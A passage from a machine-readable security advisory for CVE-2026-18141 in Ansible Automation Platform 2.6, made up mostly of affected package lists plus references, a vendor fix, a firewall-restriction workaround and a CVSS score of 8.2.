"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-18141"
},
{
"category": "external",
"summary": "RHBZ#2508155",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2508155"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-18141",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-18141"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-18141",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-18141"
}
],
"release_date": "2026-07-31T15:28:47.213000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:56:41+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50336"
},
{
"category": "workaround",
"details": "Restrict network access to the EDA event stream endpoints at the firewall or load balancer level. Ensure that only trusted sources are permitted to reach the event stream ports. Additionally, monitor EDA event logs for any unexpected events originating from unverified sources.",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
"version": "3.1"
},
"products": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
